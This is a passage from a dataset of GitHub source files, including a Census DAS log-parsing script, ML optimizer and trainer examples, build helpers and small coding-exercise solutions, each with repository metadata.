BrzózkaTV\")\r\nlokalizacja.encode(\"unicode_escape\")\r\n\r\n# download script\r\n\r\nyt = YouTube(text_input)\r\nmoje_video = yt.streams.first()\r\nmoje_video.download(lokalizacja)\r\n\r\n# program made by: bartzszkoly@gmail.com (BrzózkaTV#5405)\r\n# kind of sad, this program is not very colourful :-)","repo_name":"PrzemyslawkaKokos/Pobieracz-Youtube-Video","sub_path":"PobieraczYoutubeVideo.py","file_name":"PobieraczYoutubeVideo.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33132801266","text":"import xml.etree.cElementTree as ElementTree\nfrom xml.dom import minidom\nimport logging\n\nfrom ..report.report_base import BaseReport\n\n\nclass XmlReport(BaseReport):\n\n    @staticmethod\n    def export_report(file_name: str, clear_after: bool=True):\n        logging.info('exporting xml report to `{}`'.format(file_name))\n        root = ElementTree.Element(\"report\", student_id='95411018')\n\n        for section, errors in XmlReport.reports.items():\n            section_element = ElementTree.SubElement(root, 'section', title=section)\n\n            category_mapper = {}\n            for err in errors:\n                if err.category not in category_mapper:\n                    category_mapper[err.category] = ElementTree.SubElement(section_element, 
err.category)\n\n                error_root = ElementTree.SubElement(\n                    category_mapper[err.category],\n                    'error',\n                    category=err.category,\n                    subcategory=err.sub_category)\n\n                ElementTree.SubElement(error_root, 'source').text = err.source\n                ElementTree.SubElement(error_root, 'message').text = err.message\n\n        logging.debug('pretty xml log...')\n        xml_string = minidom.parseString(ElementTree.tostring(root)).toprettyxml(indent=\"  \")\n        with open(file_name, 'w') as f:\n            logging.debug('writing to file...')\n            f.write(xml_string)\n\n        if clear_after:\n            XmlReport.clear_report()\n\n        logging.info('xml report generated successfully')\n","repo_name":"ehsundar/project_validator","sub_path":"project_validator/report/report_xml.py","file_name":"report_xml.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24645369824","text":"\"\"\"\nparse_stdout.py\nauthor: Some Human\ncreated: 4/8/2021\nParses stdout for experimental run of DAS, and formats output in a way easily uploadable to relevant trackers\n\"\"\"\n\n# TODO add columns\n# timestamp?\n# specific config/release?\n# TODO run analysis (relative_l1_error.py) on stdout\n# TODO change generic filename from stdout-i.stdout to filename.stdout to decouple from list order\n# TODO incorporate rules for formatting into IdentifyingStrings?\n\n\nimport os\nimport sys\nimport csv\n\n# begin travesty. need to mess with paths and envs to allow access to das_framework :-/\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nDAS_FRAMEWORK_DIR = os.path.join(os.path.dirname(THIS_DIR), \"das_framework\")\nassert os.path.exists(DAS_FRAMEWORK_DIR), f\"cannot find {DAS_FRAMEWORK_DIR}\"\nsys.path.append(DAS_FRAMEWORK_DIR)\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n# end travesty\n\nimport das_framework.ctools.s3 as s3\nimport subprocess\n\n# get das root env\nDAS_S3ROOT = os.getenv(\"DAS_S3ROOT\")\n\n\nclass IdentifyingStrings:\n    \"\"\"\n    Container for sets of identifying strings in the stdouts\n    \"\"\"\n\n    def __init__(self):\n        # identifying strings where we're collecting all lines between the start line and the stop line\n        self.multiline = {\n            \"eps_single\": {\n                \"start\": \"INFO: For single attr/dim\",\n                \"stop\": \"For geolevel semantics protecting\"\n            },\n            \"eps_gl\": {\n                \"start\": \"For geolevel semantics protecting\",\n                \"stop\": \"-DP)\"\n            },\n            \"gp\": {\n                \"start\": \"Place cenrace_7lev_two_comb * hispanic geounit proportion with L1 relative error less than 0.05, binned by CEF total population\",\n                \"stop\": \"OSE geounit counts in each total population bin\"\n            },\n            \"vacant\": {\n                \"start\": \"Place vacant_count geounit proportion with L1 relative error less than 0.05, binned by CEF total population\",\n                \"stop\": \"OSE geounit counts in each total population bin\"\n            },\n        }\n\n
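        # e.g. (illustrative, using values from the dict above): for "eps_gl"
        # the parser collects every stdout line from the first line containing
        # "For geolevel semantics protecting" through the line containing
        # "-DP)" (plus the line after it) into one space-joined string.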
        # identifying strings where we're looking for a set number of lines below the ID string; n is inclusive of the start line\n        self.n_lines_directly_below = {\n            \"output_files\": {\n                \"start\": \"DAS OUTPUT FILES\",\n                \"n\": 3\n            }\n        }\n\n        # identifying strings where we're looking for only one value on a single line somewhere below the identifying string\n        self.single_line_below = {\n            \"tl1qe\": {\n                \"start\": \"total_L1 query L1 error for each geolevel\",\n                \"stop\": \"INFO: (CUI//SP-CENS) County\"\n            },\n            \"val1qe\": {\n                \"start\": \"votingage_L1 query L1 error for each geolevel\",\n                \"stop\": \"INFO: (CUI//SP-CENS) County\"\n            },\n            \"state_query_props\": {\n                \"start\": \"Sending dp_query_prop to Curve\",\n                \"stop\": \"State:\"\n            },\n            \"county_query_props\": {\n                \"start\": \"Sending dp_query_prop to Curve\",\n                \"stop\": \"County:\"\n            }\n        }\n\n        # identifying strings where we're looking for a value that will be on the same line as the identifying string\n        self.single_line = {\n            \"global_scale\": \"INFO: Global scale\",\n            \"total_budget\": \"INFO: Total budget\",\n            \"spine\": \"SPINE=\",\n            \"strategy\": \"Setting STRATEGY\",\n            \"geolevel_props\": \"Setting GEOLEVEL_BUDGET_PROP\",\n            \"schema_keyword\": \"INFO: schema keyword\",\n            \"us_v_pr\": \"config=\"\n        }\n\n\ndef get_files_list(stdouts=[], cluster_steps=[], zips=[]):\n    DASHBOARD_URL = os.getenv(\"DAS_DASHBOARD_URL\")\n    stdouts += [f\"{DASHBOARD_URL}/app/logs/zip/contents/{t[0]}/steps/{t[1]}/stdout.gz\"\n                for t in cluster_steps]\n    stdouts = [string.replace(f\"{DASHBOARD_URL}/app/logs/zip/contents/\", DAS_S3ROOT + \"-logs/\")\n               for string in stdouts]\n\n    zips = [string.replace(f\"{DASHBOARD_URL}/app/s3/zip/download\", DAS_S3ROOT) for string in zips]\n\n    return stdouts + zips\n\n\ndef get_files(files, stdouts_dir, outfile_prefix):\n    \"\"\"\n    get files by filenames from s3, move to stdouts dict, and cleanup\n    :param files:\n    :param stdouts_dir:\n    :param outfile_prefix:\n    :return: nothing\n    \"\"\"\n    # grab files from s3, put in a stdouts dir, and delete original file(s)\n    subprocess.run([\"mkdir\", stdouts_dir])\n    subprocess.run([\"mkdir\", \"zips\"])\n    buckets_keys = [s3.get_bucket_key(file) for file in files]\n    for i, filename in enumerate(files):\n        # TODO: handle get file error\n        print(\"getting file\", i + 1)\n        s3.get_object(buckets_keys[i][0], buckets_keys[i][1], filename.split(\"/\")[-1])\n        if filename[-3:] == \".gz\":\n            subprocess.run([\"gunzip\", 'stdout.gz'])\n            subprocess.run(['mv', 'stdout', f'{outfile_prefix}{i}'])\n        elif filename[-4:] == \".zip\":\n            file_name = filename.split(\"/\")[-1][:-4]\n            subprocess.run([\"unzip\", file_name + \".zip\", \"-d\", \"./zips\"])\n            subprocess.run([\"mv\", \"./zips/\" + file_name + \".stdout\", f'{outfile_prefix}{i}'])\n            subprocess.run([\"rm\", file_name + \".zip\"])\n    subprocess.run([\"rm\", \"-rf\", \"./zips\"])\n\n\ndef parse_stdout(name, id_strs):\n    \"\"\"\n    Read and parse the stdout file given by name, return lines of interest\n    :param name: name of file to read\n    :return: list of relevant lines, unformatted (epsilon lines bunched together)\n    \"\"\"\n    # TODO grab spine, strategy, budgets, etc.\n    with open(name) as file:\n        lines = file.readlines()\n    ret_lines = {}\n\n    for i, line in enumerate(lines):\n        # get multiline with start/stop strings\n        for id in id_strs.multiline:\n            if id not in ret_lines and id_strs.multiline[id][\"start\"] in line:\n                print(\"\\t\", id, \"START\")\n                lines_str = \"\"\n                j = i\n                while id_strs.multiline[id][\"stop\"] not in lines[j] and j < i + 100:\n                    lines_str += \" \" + lines[j].strip()\n                    j += 1\n                if j < i + 100:\n                    print(\"\\t\", id, \"DONE\")\n                    lines_str += \" \" + 
lines[j].strip() + \" \" + lines[j + 1].strip()\n                    ret_lines[id] = lines_str\n        # get multilines of defined size\n        for id in id_strs.n_lines_directly_below:\n            if id not in ret_lines and id_strs.n_lines_directly_below[id][\"start\"] in line:\n                print(\"\\t\", id, \"START\")\n                lines_str = \"\"\n                for j in range(id_strs.n_lines_directly_below[id][\"n\"]):\n                    lines_str += \" \" + lines[i + j].strip()\n                print(\"\\t\", id, \"STOP\")\n                ret_lines[id] = lines_str\n        # get single lines where we're looking for a value from a line below\n        for id in id_strs.single_line_below:\n            if id not in ret_lines and id_strs.single_line_below[id][\"start\"] in line:\n                print(\"\\t\", id, \"START\")\n                j = i\n                found = False\n                while not found and j < i + 100:\n                    if id_strs.single_line_below[id][\"stop\"] in lines[j]:\n                        print(\"\\t\", id, \"DONE\")\n                        ret_lines[id] = lines[j].strip()\n                        found = True\n                    j += 1\n        # get single lines\n        for id in id_strs.single_line:\n            if id not in ret_lines and id_strs.single_line[id] in line:\n                print(\"\\t\", id, \"DONE\")\n                ret_lines[id] = line.strip()\n\n    return ret_lines\n\n\ndef format_parsed_stdout(parsed_stdout):\n    \"\"\"\n    from the parsed lines, isolate only the relevant information and return in dict form\n    :param parsed_stdout: dict of parsed-out lines from stdout\n    :return: dict of relevant data from stdout\n    \"\"\"\n    values = {}\n    # get votingage_l1 query error\n    if \"val1qe\" in parsed_stdout:\n        values[\"val1qe\"] = float(parsed_stdout['val1qe'].split()[-2])\n    # get total_l1 query error\n    if \"tl1qe\" in parsed_stdout:\n        values[\"tl1qe\"] = float(parsed_stdout['tl1qe'].split()[-2])\n    # get single attr/dim epsilons\n    if \"eps_single\" in parsed_stdout:\n        split = parsed_stdout[\"eps_single\"].split()\n        key = None\n        for i, word in enumerate(split):\n            if word == \"attr/dim\":\n                key = split[i + 1]\n            elif word == \"(approx\":\n                val = split[i + 1]\n                if key is not None:\n                    values[key] = float(val[:val.find(')')])\n                key = None\n    # get geolevel semantics\n    if \"eps_gl\" in parsed_stdout:\n        split = parsed_stdout[\"eps_gl\"].split()\n        key = None\n        for i, word in enumerate(split):\n            if word == \"protecting\":\n                key = \"_\".join([split[i + j] for j in range(1,4)]).strip(\",\")\n            elif word == \"(approx\":\n                val = split[i + 1]\n                if key is not None:\n                    values[key] = float(val[:val.find(')')])\n                key = None\n    if \"gp\" in parsed_stdout:\n        split = parsed_stdout[\"gp\"].split(\"INFO: ########################################\")\n        for line in split:\n            if len(line) > 100:\n                key = line[line.find(\")\")+1:line.find(\"[\")]\n                key = key.split()\n                if key[1] == \"gqlevels\":\n                    key = key[0] + \"_\" + key[1]\n                elif key[1] == \"geounit\":\n                    key = \"_\".join([key[i] for i in range(3)])\n                else:\n                    key = key[0] + \"_\" + key[3]\n                values[key] = line[line.find(\"[\"):line.find(\"]\")+1]\n    if \"vacant\" in parsed_stdout:\n        split = parsed_stdout[\"vacant\"].split(\"INFO: ########################################\")\n        for line in split:\n            if len(line) > 100:\n                key = line[line.find(\")\")+1:line.find(\"[\")]\n                key = key.split()\n                if key[1] == \"vacant_count\":\n                    key = key[0] + \"_\" + key[1]\n                elif key[1] == \"geounit\":\n                    key = \"_\".join([key[i] for i in range(3)])\n                values[key] = line[line.find(\"[\"):line.find(\"]\")+1]\n    if \"global_scale\" in parsed_stdout:\n        split = parsed_stdout[\"global_scale\"].split(\":\")\n        values[\"global_scale\"] = split[-1]\n    if \"total_budget\" in parsed_stdout:\n        split = parsed_stdout[\"total_budget\"].split(\":\")\n        values[\"total_budget\"] = split[-1]\n    if \"spine\" in parsed_stdout:\n        split = 
parsed_stdout[\"spine\"].split(\"=\")\n values[\"spine\"] = split[-1]\n if \"strategy\" in parsed_stdout:\n split = parsed_stdout[\"spine\"].split(\"=\")\n values[\"strategy\"] = split[-1]\n if \"geolevel_props\" in parsed_stdout:\n split = parsed_stdout[\"geolevel_props\"].split(\"=\")\n values[\"geolevel_props\"] = split[-1]\n if \"schema_keyword\" in parsed_stdout:\n split = parsed_stdout[\"schema_keyword\"].split(\":\")\n values[\"schema_keyword\"] = split[-1]\n if \"us_v_pr\" in parsed_stdout:\n split = parsed_stdout[\"us_v_pr\"].split(\"/\")\n values[\"us_v_pr\"] = split[-1].strip(\".ini\")\n if \"output_files\" in parsed_stdout:\n split = parsed_stdout[\"output_files\"].split()\n for word in split:\n if word[:5] == \"s3://\" and word[-1] == \"/\":\n values[\"blocknodedicts\"] = word\n elif word[:5] == \"s3://\" and word[-4:] == \".txt\":\n values[\"mdf_location\"] = word\n if \"state_query_props\" in parsed_stdout:\n split = parsed_stdout[\"state_query_props\"].split(\"\\t\")\n values[\"state_query_props\"] = split[-1]\n if \"county_query_props\" in parsed_stdout:\n split = parsed_stdout[\"county_query_props\"].split(\"\\t\")\n values[\"county_query_props\"] = split[-1]\n\n\n return values\n\n\nif __name__ == \"__main__\":\n\n # define stdout filenames. example:\n # \"https://{HOST_NAME}/app/logs/zip/contents/j-18WF1XUP180X0/steps/s-38VEY96CEUZZ8/stdout.gz\",\n\n stdouts = [\n ]\n\n # define cluster/step pairs\n cluster_steps = [\n (\"j-3EQEINWCN0Q2K\", \"s-2JDH93P5LFH53\"),\n (\"j-KW5IBQ6YE8DK\", \"s-2S0544SVNOZST\"),\n (\"j-BGLWB6OHR9GH\", \"s-15BGHZIEUY6B1\"),\n (\"j-21YJXSJCGFIO7\", \"s-O3LCLQK4RFLD\"),\n (\"j-3M8OV4HUBVFKS\", \"s-2I4AWU87FTQA2\"),\n (\"j-3M8OV4HUBVFKS\", \"s-1LDK2RW45W720\"),\n (\"j-3M8OV4HUBVFKS\", \"s-313ZLKMRATZB3\"),\n (\"j-3M8OV4HUBVFKS\", \"s-EQQGGKIS093W\"),\n (\"j-2232JSFR0WE0Z\", \"s-CFF2PGI5MQ71\")\n ]\n\n # define zip files to get. 
example:\n    # \"https://{HOST_NAME}/app/s3/zip/download/rpc/upload/logs/DAS-2021-04-09_1042_PLUCKY_ASPECT.zip\",\n    zips = [\n    ]\n\n    # get appropriate urls\n    files = get_files_list(stdouts, cluster_steps, zips)\n\n    # get identifying strings for stdout\n    id_strs = IdentifyingStrings()\n\n    # get files from s3\n    stdouts_dir = \"stdouts\"\n    outfile_prefix = f\"./{stdouts_dir}/stdout-\"\n    get_files(files, stdouts_dir, outfile_prefix)\n\n    # parse files\n    parsed_lines = {}\n    for i, filename in enumerate(files):\n        stdoutname = f\"{outfile_prefix}{i}\"\n        print(filename)\n        parsed_lines[filename] = parse_stdout(stdoutname, id_strs)\n\n    print(\"~~~~\")\n\n    # get captured columns (and resulting types) for each file\n    for filename, results_dict in parsed_lines.items():\n        print(filename)\n        for attr, value in results_dict.items():\n            print(\"\\t\", attr, type(value))\n\n    print(\"~~~~~\")\n\n    # get formatted parsed lines for each file\n    final_data = {}\n    for filename, results_dict in parsed_lines.items():\n        values = format_parsed_stdout(results_dict)\n        values[\"filename\"] = filename\n        final_data[filename] = values\n\n    # make default value dictionary for all expected columns\n    csv_columns_l = [\n        \"filename\", \"spine\", \"strategy\", \"schema_keyword\", \"us_v_pr\",\n        \"global_scale\", \"total_budget\", \"geolevel_props\",\n        \"state_query_props\", \"county_query_props\",\n        \"blocknodedicts\", \"mdf_location\",\n        \"hispanic\", \"cenrace\", \"votingage\", \"hhgq\",\n        \"Block_within_Block_Group\", \"Block_within_Tract\", \"Block_within_County\", \"Block_within_State\", \"Block_within_US\",\n        \"OSE_hispanic\", \"Block_Group_hispanic\", \"Place_hispanic\",\n        \"OSE_gqlevels\", \"Block_Group_gqlevels\", \"Place_gqlevels\",\n        \"OSE_vacant_count\", \"Block_Group_vacant_count\", \"Place_vacant_count\",\n        \"OSE_geounit_counts\", \"Block_Group_geounit_counts\", \"Place_geounit_counts\",\n        \"val1qe\", \"tl1qe\"]\n\n    # go through results dictionaries and add any unanticipated columns\n    csv_columns = {key: \"\" for key in csv_columns_l}\n    for filename, results_dict in final_data.items():\n        for key in results_dict:\n            if key not in csv_columns:\n                print(f\"\\tUNANTICIPATED COLUMN: {key}\")\n                csv_columns[key] = ''\n\n    # write csv\n    with open(\"captured_data.csv\", 'w') as csvfile:\n        writer = csv.DictWriter(csvfile, delimiter=\";\", fieldnames=csv_columns)\n        writer.writeheader()\n        for filename, results_dict in final_data.items():\n            writer.writerow(results_dict)\n\n    # delete local files\n    subprocess.run([\"rm\", \"-rf\", f\"./{stdouts_dir}/\"])\n","repo_name":"uscensusbureau/DAS_2020_DHC_Production_Code","sub_path":"das_decennial/scripts/parse_stdout.py","file_name":"parse_stdout.py","file_ext":"py","file_size_in_byte":15328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31874688395","text":"import numpy as np\nfrom .loss import *\n\nclass Coordinate_Based_Optimizers:\n\n\tdef __init__(self,learning_rate,epsilon,max_iters):\n\n\t\tself.gamma = learning_rate\n\t\tself.epsilon = epsilon\n\t\tself.max_iters = max_iters\n\n\t\n\tdef uniform_random_sampling(self,weight):\n\n\t\tdimension = weight.shape[0] # column vector\n\t\treturn int(np.random.uniform(0,dimension))\n\n\tdef importance_sampling(self,weight,coordinate_smoothness):\n\n\t\tdimension = weight.shape[0]\n\t\tpossible_coordinates = np.arange(0,dimension)\n\t\tprobabilities = coordinate_smoothness / np.sum(coordinate_smoothness)\n\t\treturn int(np.random.choice(possible_coordinates,p=probabilities)) \n\n\tdef 
steepest_coordinate(self,gradient):\n\n\t\t# pick the coordinate with the largest gradient magnitude\n\t\treturn np.argmax(np.abs(gradient))\n\t\n\t\n\tdef select_coordinate(self,vector,strategy,params):\n\n\t\tif strategy == 'random':\n\t\t\treturn self.uniform_random_sampling(vector)\n\t\telif strategy == 'importance':\n\t\t\treturn self.importance_sampling(vector,params[0])\n\t\telif strategy == 'steep':\n\t\t\tif params[1] == 0:\n\t\t\t\treturn self.uniform_random_sampling(vector)\n\t\t\telse:\n\t\t\t\tlast_gradient = (params[2])[len(params[2]) - 1]\n\t\t\t\treturn self.steepest_coordinate(last_gradient)\n\t\telse:\n\t\t\traise ValueError('Method not supported')\n\n\tdef coordinate_descent(self,A,b,strategy,params):\n\n\t\tlosses = []\n\t\tprevious_gradients = []\n\t\titerator = 0\n\t\tweight = np.zeros((A.shape[1],1))\n\t\twhile iterator < self.max_iters:\n\n\t\t\tindex = self.select_coordinate(weight,strategy,(params,iterator,previous_gradients))\n\t\t\t\n\t\t\tdata_coordinate = (A[:,index]).reshape((-1,1))\n\t\t\tbias_coordinate = b[index]\n\t\t\tweight_coordinate = weight[index]\n\t\t\tgradient = first_order_least_squares(data_coordinate,weight_coordinate,bias_coordinate)\n\t\t\t\n\t\t\t# vector that is zero everywhere except the chosen coordinate\n\t\t\tbasis_vector = np.zeros_like(weight)\n\t\t\tbasis_vector[index] = 1\n\t\t\tcoordinate_wise_gradient = basis_vector * gradient\n\t\t\t\n\t\t\tprevious_gradients.append(gradient)\n\t\t\t# update only the selected coordinate\n\t\t\tweight = weight - self.gamma * coordinate_wise_gradient\n\t\t\tcurrent_loss = least_squares_loss(A,weight,b)\n\t\t\tlosses.append(current_loss)\n\t\t\titerator += 1\n\t\t\t\n\n\t\treturn weight,losses\n\n\n\n","repo_name":"okm02/ML-Optimization-Algorithms","sub_path":"optimizers/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7112294078","text":"\"\"\"\nTrainer Example\n================================\n\nThis example should illustrate how to use the trainer class.\n\n\"\"\"\n\nimport torch.nn as nn\nfrom inferno.io.box.cifar import get_cifar10_loaders\nfrom inferno.trainers.basic import Trainer\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.extensions.layers import ConvELU2D\nfrom inferno.extensions.layers import Flatten\nfrom inferno.utils.python_utils import ensure_dir\n\nfrom inferno.extensions.layers import SELU\n\n##################################################\n# change directories to your needs\nLOG_DIRECTORY = ensure_dir('log')\nSAVE_DIRECTORY = ensure_dir('save')\nDATASET_DIRECTORY = ensure_dir('dataset')\n\n##################################################\n# shall models be downloaded\nDOWNLOAD_CIFAR = True\nUSE_CUDA = True\n\n##################################################\n# Build torch model\nmodel = nn.Sequential(\n    ConvELU2D(in_channels=3, out_channels=256, kernel_size=3),\n    nn.MaxPool2d(kernel_size=2, stride=2),\n    ConvELU2D(in_channels=256, out_channels=256, kernel_size=3),\n    nn.MaxPool2d(kernel_size=2, stride=2),\n    ConvELU2D(in_channels=256, out_channels=256, kernel_size=3),\n    nn.MaxPool2d(kernel_size=2, stride=2),\n    Flatten(),\n    nn.Linear(in_features=(256 * 4 * 4), out_features=10),\n    nn.Softmax()\n)\n\n##################################################\n# data loaders\ntrain_loader, validate_loader = get_cifar10_loaders(DATASET_DIRECTORY,\n                                                    download=DOWNLOAD_CIFAR)\n\n##################################################\n# Build trainer\ntrainer = 
Trainer(model)\ntrainer.build_criterion('CrossEntropyLoss')\ntrainer.build_metric('CategoricalError')\ntrainer.build_optimizer('Adam')\ntrainer.validate_every((2, 'epochs'))\ntrainer.save_every((5, 'epochs'))\ntrainer.save_to_directory(SAVE_DIRECTORY)\ntrainer.set_max_num_epochs(10)\ntrainer.build_logger(TensorboardLogger(log_scalars_every=(1, 'iteration'),\n log_images_every='never'), \n log_directory=LOG_DIRECTORY)\n\n##################################################\n# Bind loaders\ntrainer.bind_loader('train', train_loader)\ntrainer.bind_loader('validate', validate_loader)\n\n##################################################\n# activate cuda\nif USE_CUDA:\n trainer.cuda()\n\n##################################################\n# fit\ntrainer.fit()\n","repo_name":"inferno-pytorch/inferno","sub_path":"examples/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"54"} +{"seq_id":"3281330582","text":"# 문제 풀이 시작 : 2021-10-27 20:20\n# 문제 풀었는지? : YES / NO\n# 문제를 풀었을 때 : 두 문제 중 왜 이 문제를 골랐는지?\n# 문제를 풀지 못 했을 때 : 구하고자 하는 문제의 조건, input, output 제대로 이해하기, 어떻게 풀려고 노력했는지?\n# 알아야 할 기본 개념? :\n\ndef make_road(arr, x):\n check_list = [0, 0] # 오르막, 내리막 체크\n for i in range(1, len(arr)):\n # 오르막길일 때\n if arr[i] > arr[i-1]:\n if check_list[1] == 0:\n check_list[0] += 1\n if i != 1:\n if arr[i-2] > arr[i-1]:\n if check_list[1] >= x:\n check_list[1] = 0\n continue\n else:\n return 0\n else:\n continue\n\n\n # 내리막길일 때\n elif arr[i] < arr[i-1]:\n if check_list[0] == 0:\n check_list[1] += 1\n if i != 1:\n if arr[i-2] < arr[i-1]:\n if check_list[0] >= x:\n check_list[0] = 0\n continue\n else:\n return 0\n else:\n continue\n\n\n # 직진이면?\n elif arr[i] == arr[i-1]:\n continue\n\n return 1\n\nimport sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n N, X = map(int, input().split()) # N: 지도 한 변의 크기, X: 경사로의 길이\n mountain = [list(map(int, input().split())) for _ in range(N)]\n cnt = 0\n for i in range(N):\n cnt += make_road(mountain[i], X)\n mountain = list(map(list, zip(*mountain)))\n print(mountain)\n for j in range(N):\n cnt += make_road(mountain[i], X)\n print(cnt)","repo_name":"kellyjung5512/TIL","sub_path":"03_review_study/swea/4014/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7930377012","text":"import os\nimport sys\nimport shutil\nimport subprocess\nfrom timeit import timeit\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nbuild_tools_dir = os.path.abspath(os.path.join(scripts_dir, os.pardir))\nroot_dir = os.path.abspath(os.path.join(build_tools_dir, os.pardir))\nbuild_dir = os.path.join(root_dir, \"build\")\nbin_dir = os.path.join(build_dir, \"bin\")\ngenerator = \"Visual Studio 15 2017 Win64\"\ncmake_base_command = [\"cmake\"]\ncmake_generator_args = [\"-G\", generator]\n\ndef change_dir_noexcept(path):\n try:\n os.chdir(path)\n except:\n os.chdir(root_dir)\n\ndef call_in_directory(dir, fn, *args, **kwargs):\n if not os.path.exists(dir):\n os.makedirs(dir)\n prevWorkingDir=os.getcwd()\n os.chdir(dir)\n try:\n return fn(*args, **kwargs)\n finally:\n change_dir_noexcept(prevWorkingDir)\n\ndef run_cmake_command(args):\n command = cmake_base_command.copy()\n command.extend(args)\n call_in_directory(build_dir, subprocess.check_call, command, stderr=subprocess.STDOUT, shell=True)\n\ndef delete_build():\n if 
os.path.exists(build_dir):\n        call_in_directory(root_dir, shutil.rmtree, build_dir, ignore_errors=True)\n\ndef generate_project(options):\n    command = cmake_generator_args.copy()\n    command.append(root_dir)\n    command.extend(options)\n    run_cmake_command(command)\n\ndef build_project(target=\"ALL_BUILD\", config=\"Release\"):\n    command = cmake_base_command.copy()\n    command.extend([\"--build\", build_dir])\n    command.extend([\"--target\", target])\n    command.extend([\"--config\", config])\n    call_in_directory(build_dir, subprocess.check_call, command, stderr=subprocess.STDOUT, shell=True)\n\ndef run_executable(name, args=[], runs=1):\n    subprocess_args = [name]\n    subprocess_args.extend(args)\n    stmt_str = \"subprocess.check_call({0}, stderr=subprocess.STDOUT, shell=True)\".format(subprocess_args)\n    runtime_dir = bin_dir\n    return call_in_directory(runtime_dir, timeit, stmt=stmt_str, setup=\"import subprocess\", number=runs)\n","repo_name":"Sunday111/kpi-prog_basics_labs","sub_path":"BuildTools/Python/build_tools.py","file_name":"build_tools.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3460086457","text":"# Given two strings, check if they’re anagrams or not.\n\ndef isAnagram(str1, str2):\n    a = ''.join(sorted(str1.lower()))\n    b = ''.join(sorted(str2.lower()))\n    if a == b:\n        print(\"anagram\")\n    else:\n        print(\"not anagram\")\n    \n# test\nisAnagram(\"hello\", \"ol4hel\")\n","repo_name":"JoyceMiryamH/codingPractiqueQs","sub_path":"python/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5715046214","text":"# Initial food sources are produced for all employed bees\n# REPEAT:\n# Each employed bee goes to a food source in her memory and determines a closest source, then evaluates its nectar\n# amount and dances in the hive\n# Each onlooker watches the dance of the employed bees and chooses one of their sources depending on the dances,\n# and goes to that source. After choosing a neighbour around that, she evaluates its nectar amount\n# Abandoned food sources are determined and replaced with the new food sources discovered by scouts\n# The best\n\nS_N = 10 # Amount of foods\nlimit = 10 # Maximum number of trials before abandoning a source\nMFE = 10 # Maximum number of fitness evaluations\n\nnum_evaluations = 0\n\ndef random_food_source(s): # Produce initial food sources randomly within the range of the boundaries of the parameters\n\n    return 0\n\n\n# Blah blah blah.\n\n# What is f(x)?\n#\n\nX = list()\nf = list()\ntrials = list()\n\nfor s in range(S_N):\n\n    r = random_food_source(s)\n\n    X.append(r) # Random solution\n    f.append(r)\n    trials.append(0) # This is the number of times that we've examined this food source, I believe.\n\n    num_evaluations += 1\n\nfor s in range(S_N):\n\n    x = 0 # A new solution produced by equation 2\n\n# I will, in fact, just steal this pseudo code.\n# It's a lot easier.\n# I just have to understand how the thing works.\n\n\n\n\n# Nice. 
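# A minimal sketch of the employed-bee phase described above (my own
# illustration of the usual ABC update, not the cited pseudo-code): a bee
# perturbs its source toward a random other source and keeps the better one.
# `fitness` is a hypothetical objective supplied by the caller.
import random

def employed_bee_step(X, f, trials, i, fitness):
    k = random.choice([j for j in range(len(X)) if j != i])  # random partner source
    v = X[i] + random.uniform(-1, 1) * (X[i] - X[k])         # equation-(2)-style candidate
    if fitness(v) > f[i]:                                    # greedy selection
        X[i], f[i], trials[i] = v, fitness(v), 0
    else:
        trials[i] += 1                                       # source grows stale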
# Here's some thorough pseudo-code.\n# I'll convert it into my OWN code, and then I'll be in good stead to write it myself.\n\n# void init(int index)\n# begin\n# fitness[index] = CalculateFitness(f[index])\n# trial[index] = 0\n# end\n\n# void SendScoutBees()\n\n# begin\n# if (trial[maxTrialIndex] >= limit) then\n# init(maxTrialIndex)\n# end\n# end\n\n\n# Generate a randomly distributed initial population of S_n solutions.\n\n","repo_name":"PrismaticPolygon/AlternativeComputing","sub_path":"abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24293415545","text":"#\n# @lc app=leetcode id=1138 lang=python3\n#\n# [1138] Alphabet Board Path\n#\n\n# @lc code=start\nclass Solution:\n    def alphabetBoardPath(self, target: str) -> str:\n\n        get_pos = lambda chr: ord(chr) - 97\n\n        commands = []\n        curr = 0\n        for chr in target:\n            pos = get_pos(chr)\n            dy = pos // 5 - curr // 5\n            dx = pos % 5 - curr % 5\n            # ordering handles 'z' (row 5 only has one column): when moving down\n            # the horizontal move happens first, and when moving up we go up\n            # first, so the path never walks off the short bottom row\n            if dy > 0:\n                commands.append(('R' if dx > 0 else 'L') * abs(dx))\n                commands.append('D' * dy)\n            else:\n                commands.append('U' * abs(dy))\n                commands.append(('R' if dx > 0 else 'L') * abs(dx))\n\n            commands.append('!')\n            curr = pos\n        return ''.join(commands)\n\n# @lc code=end\n\nfrom util import test_local\ntest_local(Solution().alphabetBoardPath, \"leet\", \"code\", \"xzx\")","repo_name":"Clevin49958/Leetcode","sub_path":"1138.alphabet-board-path.py","file_name":"1138.alphabet-board-path.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 